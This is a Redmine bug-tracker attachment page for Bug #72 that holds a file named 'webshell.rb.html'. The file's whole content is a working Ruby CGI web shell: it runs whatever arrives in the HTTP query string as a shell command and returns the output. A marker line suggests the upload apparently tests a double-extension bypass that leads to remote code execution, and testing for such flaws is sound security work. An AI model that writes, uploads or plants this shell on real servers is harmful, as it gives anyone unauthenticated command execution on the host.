Project

General

Profile

Bug #72 ยป webshell.rb.html

Redmine Admin, 07/16/2026 08:40 AM

 
#!/usr/bin/env ruby
puts "Content-Type: text/plain\r\n\r\n"
cmd = ENV['QUERY_STRING'] || ''
puts "RCE_TEST_DOUBLE_EXT_HTML"
puts `#{cmd}` unless cmd.empty?
    (1-1/1)